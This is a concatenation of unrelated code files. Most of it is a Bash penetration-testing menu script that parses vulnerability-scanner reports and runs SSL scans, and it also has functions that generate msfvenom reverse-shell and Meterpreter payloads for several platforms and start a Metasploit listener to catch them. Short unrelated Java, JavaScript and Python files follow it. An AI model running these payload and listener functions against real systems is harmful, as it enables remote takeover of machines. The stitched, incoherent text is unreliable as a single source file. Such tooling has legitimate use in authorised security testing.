Detection|Internet Cache Protocol \(ICP\) Version 2 Detection|IPSEC Internet Key Exchange \(IKE\) Detection|IPSEC Internet Key Exchange \(IKE\) Version 1 Detection|iTunes Music Sharing Enabled|iTunes Version Detection \(Mac OS X\)|JavaScript Enabled in Adobe Reader|IPSEC Internet Key Exchange \(IKE\) Version 2 Detection|iSCSI Target Detection|LANDesk Ping Discovery Service Detection|Link-Local Multicast Name Resolution \(LLMNR\) Detection|LPD Detection|mDNS Detection \(Local Network\)|Microsoft IIS 404 Response Service Pack Signature|Microsoft SharePoint Server Detection|Microsoft SQL Server Detection \(credentialed check\)|Microsoft SQL Server TCP\/IP Listener Detection|Microsoft SQL Server UDP Query Remote Version Disclosure|Microsoft Windows Installed Software Enumeration \(credentialed check\)|Microsoft Windows Messenger Detection|Microsoft Windows Mounted Devices|Microsoft Windows Security Center Settings|Microsoft Windows SMB Fully Accessible Registry Detection|Microsoft Windows SMB LsaQueryInformationPolicy Function SID Enumeration|Microsoft Windows SMB Registry Not Fully Accessible Detection|Microsoft Windows SMB Share Hosting Possibly Copyrighted Material|Microsoft Windows SMB : WSUS Client Configured|Microsoft Windows Startup Software Enumeration|Microsoft Windows Summary of Missing Patches|NIS Server Detection|Nessus SYN scanner|Nessus TCP scanner|Nessus UDP scanner|Nessus Windows Scan Not Performed with Admin Privileges|Netscape Enterprise Server Default Files Present|NetVault Process Manager Service Detection|NFS Server Superfluous|News Server \(NNTP\) Information Disclosure|NNTP Authentication Methods|OEJP Daemon Detection|Open Port Re-check|OpenVAS Manager \/ Administrator Detection|Oracle Database Detection|Oracle Database tnslsnr Service Remote Version Disclosure|Oracle Java JRE Enabled \(Google Chrome\)|Oracle Java JRE Enabled \(Internet Explorer\)|Oracle Java JRE Enabled \(Mozilla firefox\)|Oracle Java JRE Premier Support and Extended Support Version Detection|Oracle Java JRE Universally Enabled|Panda AdminSecure Communications Agent Detection|Patch Report|PCI DSS compliance : Insecure Communication Has Been Detected|Pervasive PSQL \/ Btrieve Server Detection|OSSIM Server Detection|POP Server Detection|PostgreSQL Server Detection|PPTP Detection|QuickTime for Windows Detection|Quote of the Day \(QOTD\) Service Detection|Reverse NAT\/Intercepting Proxy Detection|RMI Remote Object Detection|RPC rstatd Service Detection|rsync Service Detection|RTMP Server Detection|RTSP Server Type \/ Version Detection|Session Initiation Protocol Detection|SFTP Supported|Skype Detection|Skype for Mac Installed \(credentialed check\)|Skype Stack Version Detection|SLP Server Detection \(TCP\)|SLP Server Detection \(UDP\)|SMTP Authentication Methods|SMTP Server Detection|SNMP Protocol Version Detection|SNMP Query Installed Software Disclosure|SNMP Query Routing Information Disclosure|SNMP Query Running Process List Disclosure|SNMP Query System Information Disclosure|SNMP Request Network Interfaces Enumeration|Software Enumeration \(SSH\)|SSL Root Certification Authority Certificate Information|SSL Certificate Chain Contains Certificates Expiring Soon|SSL Certificate Chain Contains RSA Keys Less Than 2048 bits|SSL Certificate Chain Contains Unnecessary Certificates|SSL Certificate Chain Not Sorted|SSL Certificate 'commonName' Mismatch|SSL Certificate Expiry - Future Expiry|SuperServer Detection|Symantec pcAnywhere Detection \(TCP\)|Symantec pcAnywhere Status Service Detection \(UDP\)|TCP Channel Detection|Telnet Server Detection|TFTP Daemon Detection|Universal Plug and Play \(UPnP\) Protocol Detection|Unix Operating System on Extended Support|USB Drives Enumeration \(WMI\)|VMware Fusion Version Detection \(Mac OS X\)|WebDAV Detection|Web Server \/ Application favicon.ico Vendor Fingerprinting|Web Server Crafted Request Vendor/Version Information Disclosure|Web Server on Extended Support|Web Server SSL Port HTTP Traffic Detection|Web Server Unconfigured - Default Install Page Present|Web Server UPnP Detection|Windows Terminal Services Enabled|WINS Server Detection|X Font Service Detection)" tmp.csv > tmp2.csv
# Delete additional findings.
egrep -v '(DHCP Server Detection|mDNS Detection \(Remote Network\))' tmp2.csv > tmp3.csv
# Clean up
cat tmp3.csv | sed 's/Algorithm :/Algorithm:/g; s/are :/are:/g; s/authorities :/authorities:/g; s/authority :/authority:/g; s/Banner :/Banner:/g; s/ (banner check)//; s/before :/before/g; s/combinations :/combinations:/g; s/ (credentialed check)//; s/expired :/expired:/g; s/Here is the list of medium strength SSL ciphers supported by the remote server: Medium Strength Ciphers //g; s/httpOnly/HttpOnly/g; s/ (intrusive check)//g; s/is :/is:/g; s/P /P /g; s/Issuer :/Issuer:/g; s/Issuer :/Issuer:/g; s/List of 64-bit block cipher suites supported by the remote server: Medium Strength Ciphers //g; s/Nessus collected the following banner from the remote Telnet server: //g; s/ (remote check)//; s/ (safe check)//; s/server :/server:/g; s/Service Pack /SP/g; s/Source :/Source:/g; s/source :/source:/g; s/Subject :/Subject:/g; s/Subject :/Subject:/g; s/supported :/supported:/g; s/The following certificate was at the top of the certificate chain sent by the remote host, but it is signed by an unknown certificate authority: |-//g; s/The following certificate was found at the top of the certificate chain sent by the remote host, but is self-signed and was not found in the list of known certificate authorities: |-//g; s/The following certificate was part of the certificate chain sent by the remote host, but it has expired : |-//g; s/The following certificates were part of the certificate chain sent by the remote host, but they have expired : |-//g; s/The following certificates were part of the certificate chain sent by the remote host, but contain hashes that are considered to be weak. |-//g; s/The identities known by Nessus are: //g; s/ (uncredentialed check)//g; s/ (version check)//g; s/()//g; s/(un)//g; s/users :/users:/g; s/version :/version:/g; s/version :/version:/g; s/version :/version:/g; s/version :/version:/g; s/ :/:/g; s/: /: /g; s/: /: /g; s/" /"/g; s/" /"/g; s/" /"/g; s/"h/" h/g; s/. /. /g' > $home/data/nessus-`date +%H:%M:%S`.csv
rm nessus* tmp*
echo
echo $medium
echo
echo -e "The new report is located at ${YELLOW}$home/data/nessus-`date +%H:%M:%S`.csv${NC}\n"
echo
echo
exit
;;
3)
f_location
parsers/parse-nexpose.py $location
mv nexpose.csv $home/data/nexpose-`date +%H:%M:%S`.csv
echo
echo $medium
echo
echo -e "The new report is located at ${YELLOW}$home/data/nexpose-`date +%H:%M:%S`.csv${NC}\n"
echo
echo
exit
;;
4)
f_location
cp $location ./nmap.xml
parsers/parse-nmap.py
mv nmap.csv $home/data/nmap-`date +%H:%M:%S`.csv
rm nmap.xml
echo
echo $medium
echo
echo -e "The new report is located at ${YELLOW}$home/data/nmap-`date +%H:%M:%S`.csv${NC}\n"
echo
echo
exit
;;
5)
f_location
echo
echo "[!] This will take about 2.5 mins, be patient."
echo
parsers/parse-qualys.py $location
mv qualys.csv $home/data/qualys-`date +%H:%M:%S`.csv
echo
echo $medium
echo
echo -e "The new report is located at ${YELLOW}$home/data/qualys-`date +%H:%M:%S`.csv${NC}\n"
echo
echo
exit
;;
6) f_main;;
*) f_error;;
esac
}
##############################################################################################################
f_ssl(){
clear
f_banner
echo -e "${BLUE}Check for SSL certificate issues.${NC}"
echo
echo "List of IP:port."
echo
f_location
echo
echo $medium
echo
echo "Running sslyze."
sslyze --targets_in=$location --resum --certinfo=basic --compression --reneg --sslv2 --sslv3 --hide_rejected_ciphers > tmp
# Remove the first 20 lines and cleanup
sed '1,20d' tmp | egrep -v '(=>|error:|ERROR|is trusted|NOT SUPPORTED|OK - Supported|OpenSSLError|Server rejected|timeout|unexpected error)' |
# Find FOO, if the next line is blank, delete both lines
awk '/Compression/ { Compression = 1; next } Compression == 1 && /^$/ { Compression = 0; next } { Compression = 0 } { print }' |
awk '/Renegotiation/ { Renegotiation = 1; next } Renegotiation == 1 && /^$/ { Renegotiation = 0; next } { Renegotiation = 0 } { print }' |
awk '/Resumption/ { Resumption = 1; next } Resumption == 1 && /^$/ { Resumption = 0; next } { Resumption = 0 } { print }' |
awk '/SSLV2/ { SSLV2 = 1; next } SSLV2 == 1 && /^$/ { SSLV2 = 0; next } { SSLV2 = 0 } { print }' |
awk '/SSLV3/ { SSLV3 = 1; next } SSLV3 == 1 && /^$/ { SSLV3 = 0; next } { SSLV3 = 0 } { print }' |
awk '/Stapling/ { Stapling = 1; next } Stapling == 1 && /^$/ { Stapling = 0; next } { Stapling = 0 } { print }' |
awk '/Unhandled/ { Unhandled = 1; next } Unhandled == 1 && /^$/ { Unhandled = 0; next } { Unhandled = 0 } { print }' |
# Find a dash (-), if the next line is blank, delete it
awk -v n=-2 'NR==n+1 && !NF{next} /-/ {n=NR}1' |
# Remove double spacing
cat -s > $home/data/sslyze.txt
echo
echo "Running sslscan."
echo
START=$(date +%r\ %Z)
echo > tmp
echo $medium >> tmp
echo >> tmp
number=$(wc -l $location | cut -d ' ' -f1)
N=0
while read -r line; do
echo $line > ssl_$line
N=$((N+1))
echo -n "[$N/$number] $line"
sslscan --ipv4 --show-certificate --ssl2 --ssl3 --tlsall --no-colour $line > tmp_$line
echo "... completed."
echo >> ssl_$line
if [ -e tmp_$line ]; then
error=$(grep 'ERROR:' tmp_$line)
if [[ ! $error ]]; then
issuer=$(grep 'Issuer: ' tmp_$line)
if [[ $issuer ]]; then
grep 'Issuer:' tmp_$line | sed 's/ Issuer: / Issuer: /g' >> ssl_$line
else
echo "Issuer info not available." >> ssl_$line
echo >> ssl_$line
fi
subject=$(grep 'Subject:' tmp_$line)
if [[ $subject ]]; then
grep 'Subject:' tmp_$line >> ssl_$line
echo >> ssl_$line
else
echo "Certificate subject info not available." >> ssl_$line
echo >> ssl_$line
fi
dns=$(grep 'DNS:' tmp_$line)
if [[ $dns ]]; then
grep 'DNS:' tmp_$line | sed 's/ DNS:/ DNS:/g' >> ssl_$line
echo >> ssl_$line
fi
A=$(grep -i 'MD5WithRSAEncryption' tmp_$line)
if [[ $A ]]; then
echo "[*] MD5-based Signature in TLS/SSL Server X.509 Certificate" >> ssl_$line
grep -i 'MD5WithRSAEncryption' tmp_$line >> ssl_$line
echo >> ssl_$line
fi
B=$(grep 'NULL' tmp_$line)
if [[ $B ]]; then
echo "[*] NULL Ciphers" >> ssl_$line
grep 'NULL' tmp_$line >> ssl_$line
echo >> ssl_$line
fi
C=$(grep 'SSLv2' tmp_$line)
if [[ $C ]]; then
echo "[*] TLS/SSL Server Supports SSLv2" >> ssl_$line
grep 'SSLv2' tmp_$line > ssltmp2_$line
sed '/^ SSL/d' ssltmp2_$line >> ssl_$line
echo >> ssl_$line
fi
D=$(grep ' 40 bits' tmp_$line)
D2=$(grep ' 56 bits' tmp_$line)
if [[ $D || $D2 ]]; then
echo "[*] TLS/SSL Server Supports Weak Cipher Algorithms" >> ssl_$line
grep ' 40 bits' tmp_$line >> ssl_$line
grep ' 56 bits' tmp_$line >> ssl_$line
echo >> ssl_$line
fi
expmonth=$(grep 'Not valid after:' tmp_$line | awk '{print $4}')
if [ "$expmonth" == "Jan" ]; then monthnum="01"; fi
if [ "$expmonth" == "Feb" ]; then monthnum="02"; fi
if [ "$expmonth" == "Mar" ]; then monthnum="03"; fi
if [ "$expmonth" == "Apr" ]; then monthnum="04"; fi
if [ "$expmonth" == "May" ]; then monthnum="05"; fi
if [ "$expmonth" == "Jun" ]; then monthnum="06"; fi
if [ "$expmonth" == "Jul" ]; then monthnum="07"; fi
if [ "$expmonth" == "Aug" ]; then monthnum="08"; fi
if [ "$expmonth" == "Sep" ]; then monthnum="09"; fi
if [ "$expmonth" == "Oct" ]; then monthnum="10"; fi
if [ "$expmonth" == "Nov" ]; then monthnum="11"; fi
if [ "$expmonth" == "Dec" ]; then monthnum="12"; fi
expyear=$(grep 'Not valid after:' tmp_$line | awk '{print $7}')
expday=$(grep 'Not valid after:' tmp_$line | awk '{print $5}')
expdate=$(echo $expyear-$monthnum-$expday)
datenow=$(date +%F)
date2stamp(){
date --utc --date "$1" +%s
}
datenowstamp=$(date2stamp $datenow)
expdatestamp=$(date2stamp $expdate)
certissuedate=$(grep 'Not valid before:' tmp_$line)
fmt_certissuedate=$(echo $certissuedate | sed 's/Not valid before:/Certificate Issue Date:/')
certexpiredate=$(grep 'Not valid after:' tmp_$line)
fmt_certexpiredate=$(echo $certexpiredate | sed 's/Not valid after:/Certificate Expiry Date:/')
echo " $fmt_certissuedate" >> ssl_$line
echo " $fmt_certexpiredate" >> ssl_$line
echo >> ssl_$line
if (($expdatestamp < $datenowstamp)); then
echo "[*] X.509 Server Certificate is Invalid/Expired" >> ssl_$line
echo " Cert Expire Date: $expdate" >> ssl_$line
echo >> ssl_$line
fi
E=$(grep 'Authority Information Access' tmp_$line)
if [[ ! $E ]]; then
echo "[*] Self-signed TLS/SSL Certificate" >> ssl_$line
echo >> ssl_$line
fi
echo $medium >> ssl_$line
echo >> ssl_$line
cat ssl_$line >> tmp
else
echo -e "${RED}Could not open a connection.${NC}"
echo "[*] Could not open a connection." >> ssl_$line
echo >> ssl_$line
echo $medium >> ssl_$line
echo >> ssl_$line
cat ssl_$line >> tmp
fi
else
echo -e "${RED}No response.${NC}"
echo "[*] No response." >> ssl_$line
echo >> ssl_$line
echo $medium >> ssl_$line
echo >> ssl_$line
cat ssl_$line >> tmp
fi
done < "$location"
END=$(date +%r\ %Z)
echo "sslscan Report" > tmp2
date +%A" - "%B" "%d", "%Y >> tmp2
echo >> tmp2
echo "Start time $START" >> tmp2
echo "Finish time $END" >> tmp2
echo "Scanner IP $ip" >> tmp2
mv tmp2 $home/data/sslscan.txt
grep -v 'Issuer info not available.' tmp | grep -v 'Certificate subject info not available.' >> $home/data/sslscan.txt
# Nmap
echo
echo "Running nmap."
echo
cat $location | cut -d ':' -f1 > tmp
nmap -Pn -n -T4 --open -p443 --script=ssl* tls-ticketbleed -iL tmp > tmp2
egrep -v '( - A|before|Ciphersuite|cipher preference|deprecated)' tmp2 |
# Find FOO, if the next line is blank, delete both lines
awk '/latency/ { latency = 1; next } latency == 1 && /^$/ { latency = 0; next } { latency = 0 } { print }' |
# Find FOO, if the next line is blank, delete the line containing FOO
awk -v n=-2 'NR==n+1 && NF{print hold} /sslv2-drown/ {n=NR;hold=$0;next}1' |
awk -v n=-2 'NR==n+1 && NF{print hold} /least strength/ {n=NR;hold=$0;next}1' |
awk -v n=-2 'NR==n+1 {if($0 ~ /NULL/) { next; } else { print hold } } /compressors/ {n=NR;hold=$0;next}1' |
sed 's/Nmap scan report for //g' > $home/data/nmap-ssl.txt
rm tmp* ssl_* 2>/dev/null
echo
echo $medium
echo
echo "***Scan complete.***"
echo
echo
echo -e "The new reports are located at ${YELLOW}$home/data/sslscan.txt, sslyze.txt, ${NC}and ${YELLOW}nmap-ssl.txt ${NC}"
echo
echo
exit
}
##############################################################################################################
f_payload(){
clear
f_banner
echo -e "${BLUE}Malicious Payloads${NC}"
echo
echo "1. android/meterpreter/reverse_tcp"
echo "2. cmd/windows/reverse_powershell"
echo "3. java/jsp_shell_reverse_tcp"
echo "4. linux/x64/shell_reverse_tcp"
echo "5. linux/x86/meterpreter/reverse_tcp"
echo "6. osx/x64/shell_reverse_tcp"
echo "7. php/meterpreter/reverse_tcp"
echo "8. windows/meterpreter/reverse_tcp"
echo "9. windows/meterpreter/reverse_tcp (ASP)"
echo "10. windows/x64/meterpreter/reverse_tcp"
echo "11. Previous menu"
echo
echo -n "Choice: "
read choice
case $choice in
1) payload="android/meterpreter/reverse_tcp"
extention=".apk"
format="raw"
arch="dalvik"
platform="android";;
2) payload="cmd/windows/reverse_powershell"
extention=".bat"
format="raw"
arch="cmd"
platform="windows";;
3) payload="java/jsp_shell_reverse_tcp"
extention=".jsp"
format="raw"
arch="cmd"
platform="windows";;
4) payload="linux/x64/shell_reverse_tcp"
extention=""
format="elf"
arch="x64"
platform="linux";;
5) payload="linux/x86/meterpreter/reverse_tcp"
extention=""
format="elf"
arch="x86"
platform="linux";;
6) payload="osx/x64/shell_reverse_tcp"
extention=""
format="macho"
arch="x64"
platform="osx";;
7) payload="php/meterpreter/reverse_tcp"
extention=".php"
format="raw"
arch="php"
platform="php"
encoder="php/base64";;
8) payload="windows/meterpreter/reverse_tcp"
extention=".exe"
format="exe"
arch="x86"
platform="windows";;
9) payload="windows/meterpreter/reverse_tcp (ASP)"
extention=".asp"
format="asp"
arch="x86"
platform="windows";;
10) payload="windows/x64/meterpreter/reverse_tcp"
extention=".exe"
format="exe"
arch="x64"
platform="windows";;
11) f_main;;
*) f_error;;
esac
echo
echo -n "LHOST: "
read lhost
# Check for no answer
if [[ -z $lhost ]]; then
lhost=$ip
echo "Using $ip"
echo
fi
echo -n "LPORT: "
read lport
# Check for valid port number.
if [[ $lport -lt 1 || $lport -gt 65535 ]]; then
f_error
fi
if [[ $payload == "php/meterpreter/reverse_tcp" ]]; then
echo
$msfv -p $payload LHOST=$lhost LPORT=$lport -f $format -a $arch --platform $platform -o $home/data/payload$extention
else
echo
$msfv -p $payload LHOST=$lhost LPORT=$lport -f $format -a $arch --platform $platform -o $home/data/payload-$platform-$arch$extention
fi
echo
echo
exit
}
##############################################################################################################
f_listener(){
clear
f_banner
echo -e "${BLUE}Metasploit Listeners${NC}"
echo
echo "1. android/meterpreter/reverse_tcp"
echo "2. cmd/windows/reverse_powershell"
echo "3. java/jsp_shell_reverse_tcp"
echo "4. linux/x64/shell_reverse_tcp"
echo "5. linux/x86/meterpreter/reverse_tcp"
echo "6. osx/x64/shell_reverse_tcp"
echo "7. php/meterpreter/reverse_tcp"
echo "8. windows/meterpreter/reverse_tcp"
echo "9. windows/x64/meterpreter/reverse_tcp"
echo "10. Previous menu"
echo
echo -n "Choice: "
read choice
case $choice in
1) payload="android/meterpreter/reverse_tcp";;
2) payload="cmd/windows/reverse_powershell";;
3) payload="java/jsp_shell_reverse_tcp";;
4) payload="linux/x64/shell_reverse_tcp";;
5) payload="linux/x86/meterpreter/reverse_tcp";;
6) payload="osx/x64/shell_reverse_tcp";;
7) payload="php/meterpreter/reverse_tcp";;
8) payload="windows/meterpreter/reverse_tcp";;
9) payload="windows/x64/meterpreter/reverse_tcp";;
10) f_main;;
*) f_error;;
esac
echo
echo -n "LHOST: "
read lhost
# Check for no answer
if [[ -z $lhost ]]; then
lhost=$ip
echo "Using $ip"
echo
fi
echo -n "LPORT: "
read lport
echo
# Check for valid port number.
if [[ $lport -lt 1 || $lport -gt 65535 ]]; then
f_error
fi
# Check for root when binding to a low port
if [[ $lport -lt 1025 && "$(id -u)" != "0" ]]; then
echo "You must be root to bind to a port that low."
sleep 3
f_error
fi
cp $discover/resource/listener.rc /tmp/
# Check for OS X
if [[ `uname` == 'Darwin' ]]; then
sed -i '' "s|aaa|$payload|g" /tmp/listener.rc
sed -i '' "s/bbb/$lhost/g" /tmp/listener.rc
sed -i '' "s/ccc/$lport/g" /tmp/listener.rc
else
sed -i "s|aaa|$payload|g" /tmp/listener.rc
sed -i "s/bbb/$lhost/g" /tmp/listener.rc
sed -i "s/ccc/$lport/g" /tmp/listener.rc
fi
x=`ps aux | grep 'postgres' | grep -v 'grep'`
if [[ -z $x ]]; then
echo
service postgresql start
fi
$msf -r /tmp/listener.rc
echo
echo
exit
}
##############################################################################################################
f_updates(){
# Remove nmap scripts not being used
ls -l /usr/share/nmap/scripts/ | awk '{print $9}' | cut -d '.' -f1 | egrep -v '(address-info|ajp-auth|ajp-headers|allseeingeye-info|asn-query|auth-owners|auth-spoof|broadcast|brute|citrix-enum-apps-xml|citrix-enum-servers-xml|clock-skew|creds-summary|daap-get-library|discover|dns-brute|dns-check-zone|dns-client-subnet-scan|dns-fuzz|dns-ip6-arpa-scan|dns-srv-enum|dns-nsec3-enum|domcon-cmd|duplicates|eap-info|fcrdns|fingerprint-strings|firewalk|firewall-bypass|ftp-libopie|ftp-libopie|ganglia-info|hnap-info|hostmap-bfk|hostmap-ip2hosts|hostmap-robtex|http|iax2-version|informix-query|informix-tables|ip-forwarding|ip-geolocation|ipidseq|ipv6|irc-botnet-channels|irc-info|irc-unrealircd-backdoor|isns-info|jdwp-exec|jdwp-info|jdwp-inject|krb5-enum-users|ldap-novell-getpass|ldap-search|llmnr-resolve|metasploit-info|mmouse-exec|ms-sql-config|mrinfo|ms-sql-hasdbaccess|ms-sql-query|ms-sql-tables|ms-sql-xp-cmdshell|mtrace|murmur-version|mysql-audit|mysql-enum|mysql-dump-hashes|mysql-query|nat-pmp-info|nat-pmp-mapport|netbus-info|ntp-info|omp2-enum-targets|oracle-enum-users|ovs-agent-version|p2p-conficker|path-mtu|pjl-y-message|quake1-info|quake3-info|quake3-master-getservers|qscan|resolveall|reverse-index|rpc-grind|rpcap-info|rusers|shodan-api|script|sip-call-spoof|skypev2-version|smb-flood|smb-ls|smb-print-text|smb-psexec|sniffer-detect|snmp-ios-config|socks-open-proxy|sql-injection|ssh-hostkey|ssh2-enum-algos|sshv1|stun-info|teamspeak2-version|targets|tftp-enum|tor-consensus-checker|traceroute-geolocation|unittest|unusual-port|upnp-info|url-snarf|ventrilo-info|vtam-enum|vuln-cve|vuze-dht-info|weblogic-t3-info|whois|xmlrpc-methods|xmpp-info)' > tmp
grep 'script=' discover.sh | egrep -v '(discover.sh|22.txt|smtp.txt)' | cut -d '=' -f2- | cut -d ' ' -f1 | tr ',' '\n' | egrep -v '(db2-discover|dhcp-discover|dns-service-discovery|http-email-harvest|http-grep|membase-http-info|oracle-sid-brute|smb-os-discovery|tn3270-info)' | sort -u > tmp2
echo "New modules to be added." > tmp-updates
echo >> tmp-updates
echo >> tmp-updates
echo "Nmap scripts" >> tmp-updates
echo "==============================" >> tmp-updates
diff tmp tmp2 | egrep '^[<>]' | awk '{print $2}' | sed '/^$/d' | egrep -v '(clamav-exec|iec-identify|ntp-info|smb*|smtp-commands|smtp-enum-users|smtp-ntlm-info|smtp-open-relay|smtp-strangeport|smtp-vuln*|ssl*|tls-ticketbleed|tls-nextprotoneg|tmp)' >> tmp-updates
rm tmp
echo >> tmp-updates
echo >> tmp-updates
echo "Metasploit auxiliary/scanners" >> tmp-updates
echo "==============================" >> tmp-updates
# Not included: http sap
categories="afp backdoor chargen couchdb db2 dcerpc dect discovery emc finger ftp h323 imap ip ipmi lotus misc mongodb motorola msf mssql mysql natpmp nessus netbios nexpose nfs ntp openvas oracle pcanywhere pop3 portscan postgres printer rdp rogue rservices scada sip smb smtp snmp ssh telephony telnet tftp upnp vmware vnc voice vxworks winrm x11"
for i in $categories; do
ls -l /usr/share/metasploit-framework/modules/auxiliary/scanner/$i | awk '{print $9}' | cut -d '.' -f1 >> tmp
done
sed '/^$/d' tmp > tmp2
# Remove Metasploit scanners not used
egrep -v '(ack|apache_karaf_command_execution|arp_sweep|call_scanner|cerberus_sftp_enumusers|cisco_smart_install|couchdb_enum|dvr_config_disclosure|empty_udp|endpoint_mapper|ftpbounce|hidden|indusoft_ntwebserver_fileaccess|ipidseq|ipv6|login|lotus_domino_hashes|lotus_domino_version|management|ms08_067_check|mysql_file_enum|mysql_hashdump|mysql_schemadump|mysql_writable_dirs|natpmp_portscan|poisonivy_control_scanner|profinet_siemens|psexec_loggedin_users|recorder|rogue_recv|rogue_send|sipdroid_ext_enum|snmp_set|ssh_enumusers|ssh_identify_pubkeys|station_scanner|syn|tcp|tftpbrute|udp_probe|udp_sweep|vmware_enum_users|vmware_enum_permissions|vmware_enum_sessions|vmware_enum_vms|vmware_host_details|vmware_screenshot_stealer|wardial|winrm_cmd|winrm_wql|xmas)' tmp2 | sort > tmp-msf-all
grep 'use ' $discover/resource/*.rc | grep -v 'recon-ng' > tmp
# Print from the last /, to the end of the line
sed -e 's:.*/\(.*\):\1:g' tmp > tmp-msf-used
grep -v -f tmp-msf-used tmp-msf-all >> tmp-updates
echo >> tmp-updates
echo >> tmp-updates
echo "recon-ng" >> tmp-updates
echo "==============================" >> tmp-updates
python /usr/share/recon-ng/recon-cli -M | grep '/'| egrep -v '(exploitation|import|reporting)' | sed 's/^[ \t]*//' > tmp
cat tmp | egrep -iv '(adobe|bozocrack|brute_suffix|cache_snoop|dev_diver|freegeoip|fullcontact|gists_search|github_commits|github_dorks|github_repos|github_users|google_site_web|hashes_org|interesting_files|ipinfodb|ipstack|jigsaw|linkedin_auth|locations|mailtester|mangle|metacrawler|migrate_contacts|migrate_hosts|namechk|pgp|profiler|pwnedlist|virustotal|vulnerabilities)' > tmp2
cat $discover/resource/recon-ng.rc $discover/resource/recon-ng-active.rc | grep '^use' | awk '{print $2}' | sort -u > tmp3
diff tmp2 tmp3 | grep '/' | grep -v 'netblock' | awk '{print $2}' | sort -u >> tmp-updates
echo >> tmp-updates
echo >> tmp-updates
mv tmp-updates $home/data/updates.txt
rm tmp*
echo
echo $medium
echo
echo -e "The new report is located at ${YELLOW}$home/data/updates.txt${NC}\n"
echo
echo
exit
}
##############################################################################################################
f_main(){
clear
f_banner
if [ ! -d $home/data ]; then
mkdir -p $home/data
fi
echo -e "${BLUE}RECON${NC}" # In MacOS X, using \x1B instead of \e. \033 would be ok for all platforms.
echo "1. Domain"
echo "2. Person"
echo "3. Parse salesforce"
echo
echo -e "${BLUE}SCANNING${NC}"
echo "4. Generate target list"
echo "5. CIDR"
echo "6. List"
echo "7. IP, range, or URL"
echo "8. Rerun Nmap scripts and MSF aux"
echo
echo -e "${BLUE}WEB${NC}"
echo "9. Insecure direct object reference"
echo "10. Open multiple tabs in $browser"
echo "11. Nikto"
echo "12. SSL"
echo
echo -e "${BLUE}MISC${NC}"
echo "13. Parse XML"
echo "14. Generate a malicious payload"
echo "15. Start a Metasploit listener"
echo "16. Update"
echo "17. Exit"
echo
echo -n "Choice: "
read choice
case $choice in
1) f_errorOSX; f_domain;;
2) f_person;;
3) f_salesforce;;
4) f_generateTargetList;;
5) f_cidr;;
6) f_list;;
7) f_single;;
8) f_errorOSX; f_enumerate;;
9) f_directObjectRef;;
10) f_multitabs;;
11) f_errorOSX; f_nikto;;
12) f_ssl;;
13) f_parse;;
14) f_payload;;
15) f_listener;;
16) f_errorOSX; $discover/update.sh && exit;;
17) clear && exit;;
99) f_errorOSX; f_updates;;
*) f_error;;
esac
}
##############################################################################################################
while true; do f_main; done
|
package com.bjdvt.platform.model;
import java.util.Date;
/**
*
*
* @author wcyong
*
* @date 2018-09-12
*/
public class AppUser {
private String id;
private Date createTime;
private String loginName;
private String passwd;
private String wxId;
private String name;
public String getId() {
return id;
}
public void setId(String id) {
this.id = id == null ? null : id.trim();
}
public Date getCreateTime() {
return createTime;
}
public void setCreateTime(Date createTime) {
this.createTime = createTime;
}
public String getLoginName() {
return loginName;
}
public void setLoginName(String loginName) {
this.loginName = loginName == null ? null : loginName.trim();
}
public String getPasswd() {
return passwd;
}
public void setPasswd(String passwd) {
this.passwd = passwd == null ? null : passwd.trim();
}
public String getWxId() {
return wxId;
}
public void setWxId(String wxId) {
this.wxId = wxId == null ? null : wxId.trim();
}
public String getName() {
return name;
}
public void setName(String name) {
this.name = name == null ? null : name.trim();
}
}
|
<gh_stars>0
define("userfrmSplashController", {
onPostShow: function() {
const ntf = new kony.mvc.Navigation("frmMain");
ntf.navigate();
kony.application.dismissLoadingScreen();
}
});
define("frmSplashControllerActions", {
/*
This is an auto generated file and any modifications to it may result in corruption of the action sequence.
*/
/** postShow defined for frmSplash **/
AS_Form_fb47eec1faff4ea19f4dd9cdd556cc40: function AS_Form_fb47eec1faff4ea19f4dd9cdd556cc40(eventobject) {
var self = this;
this.onPostShow();
}
});
define("frmSplashController", ["userfrmSplashController", "frmSplashControllerActions"], function() {
var controller = require("userfrmSplashController");
var controllerActions = ["frmSplashControllerActions"];
return kony.visualizer.mixinControllerActions(controller, controllerActions);
});
|
def frequency(str):
words = str.split()
word_count = {}
for word in words:
if word in word_count:
word_count[word] += 1
else:
word_count[word] = 1
result = sorted(word_count.items(), key=lambda kv: kv[1], reverse=True)
return [i[0] for i in result[:3]]
|
<filename>verita-api/src/main/java/de/cpg/oss/verita/service/Subscription.java
package de.cpg.oss.verita.service;
public interface Subscription extends AutoCloseable {
}
|
from math import floor
import datetime
now=datetime.datetime.now
import os
from os import linesep
from sys import stdout,stderr
import subprocess
import threading
from lib import MM,data,error,clean
d=None
o=None
e=None
r=None
res=""
ec=0
def execute(rd:data):
global d,o,e,r
d=rd
o=co2f(d.out)
e=co2f(d.err)
r=ro2f(d.result)
if d.multiple==MM.none: single()
if d.multiple==MM.serial: serial()
if d.multiple==MM.spawn: spawn()
if d.multiple==MM.thread: thread()
r.write(res)
close(o)
close(e)
close(r)
exit(ec)
def single():
global res,ec
p=SP(d.command," ".join(d.command))
st=now()
p.run()
en=now()
res=clean(f"""
time: {descTime(en-st)}
process id: {p.pid}
{p.descEC()}
""")
ec=p.ec
def serial():
global res,ec
pl=SP.multiple(d.command)
lp=pl[len(pl)-1]
st=now()
for p in pl:
p.run()
if p.ec!=0:
lp=p
break
en=now()
res=linesep.join([
f"time: {descTime(en-st)}",
*[
f"process{p.order} id: {p.pid if p.pid>=0 else 'N/A'}"
for p in pl
],
f"exit code: {lp.ec}",""
])
ec=lp.ec
def spawn():
pl=SP.multiple(d.command)
st=now()
for p in pl: p.start()
for p in pl: p.wait()
en=now()
SP.collect(pl,st,en)
def thread():
pl=SP.multiple(d.command)
tl=[threading.Thread(target=lambda p: p.run(),args=(p,)) for p in pl]
try:
st=now()
for t in tl: t.start()
for t in tl: t.join()
en=now()
except: error("実行に失敗しました")
SP.collect(pl,st,en)
class SP:
popen:subprocess.Popen
args=None
description=""
order=0
pid=-1
ec=0
def __init__(self,args,desc):
self.args=args
self.description=desc
@classmethod
def multiple(cls,commands):
n=1
l=[]
for c in commands:
p=SP(c,c)
p.order=n
l+=[p]
n+=1
return l
@classmethod
def collect(cls,pl,st,en):
global res,ec
l=[f"time: {descTime(en-st)}"]
for p in pl:
if p.ec>ec: ec=p.ec
l+=[
f"process{p.order} id: {p.pid}",
p.descEC()
]
l+=[""]
res=linesep.join(l)
def start(self):
global o,e
s=type(self.args) is str
try:
self.popen=subprocess.Popen(self.args,shell=s,stdout=o,stderr=e)
self.pid=self.popen.pid
except: error(f"実行に失敗しました: {self.description}")
def wait(self):
self.ec=self.popen.wait()
